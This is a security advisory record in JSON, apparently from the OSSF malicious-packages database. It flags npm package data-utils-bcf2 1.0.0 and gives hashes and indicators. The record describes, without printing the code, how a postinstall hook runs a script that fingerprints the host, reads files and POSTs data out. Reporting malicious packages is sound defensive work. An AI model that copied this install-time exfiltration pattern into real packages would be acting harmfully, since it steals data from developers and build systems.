{"id":"MAL-2026-6090","summary":"Malicious code in data-utils-bcf2 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (52e6ddf4cbc1a035918a5bd136c865ff526f430db21268d75d3c90fa74196fdf)\nThe package declares a postinstall lifecycle hook (\"postinstall\": \"node run.js\" in package.json) that automatically executes run.js on install. run.js imports os, fs, http, https, and child_process, collects host identifying information (os.hostname(), os.platform()), reads files from disk (fs.readFileSync, fs.existsSync), and issues multiple POST requests over HTTP/HTTPS (run.js lines 134, 137, 348, 355). The combination of automatic install-time execution, host fingerprinting, filesystem reads, and outbound POSTs is the canonical install-time exfiltration shape. Installing this package on a developer machine or CI runner will run the reconnaissance and exfiltration code without user interaction.\n","modified":"2026-06-18T05:46:39.706820603Z","published":"2026-06-18T03:54:28Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","versions":["1.0.0"],"modified_time":"2026-06-18T03:54:28Z","sha256":"52e6ddf4cbc1a035918a5bd136c865ff526f430db21268d75d3c90fa74196fdf","id":"IN-MAL-2026-006960","import_time":"2026-06-18T05:42:04.371373899Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/data-utils-bcf2/v/1.0.0"}],"affected":[{"package":{"name":"data-utils-bcf2","ecosystem":"npm","purl":"pkg:npm/data-utils-bcf2"},"versions":["1.0.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/data-utils-bcf2/MAL-2026-6090.json","cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-cockDOMoPNHjz28QODHA21n/5DBJ5ytblFscjWFzHG53stSLKacUikj+jDjKsQ1Htj39ZU7q0bWRfXrl+SJ5nQ==","sha1":"c3a92d7f44c7c0064b0cdd531e84f88bfb7c6e07"},"filename":"data-utils-bcf2-1.0.0.tgz"}],"evidence_files":[{"path":"package.json","tlsh":"ece068289c20393339c02ae80c669297f7308f1b30143d2d92b72829429bb7ab47b24d","sha256":"561e6c852bc499eb123d918890a06d3da33f87965198b84c9ff50c3061499d35"},{"path":"run.js","tlsh":"c382e7b219b7461479a3e6ade66fa4005033f1177a51eda0f28c73510fcf668d1b2af8","sha256":"23c111f3ecd1f37bea0f0fb0b51d6bdac267d3adcfdd52d972f72cda6f82ac42"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}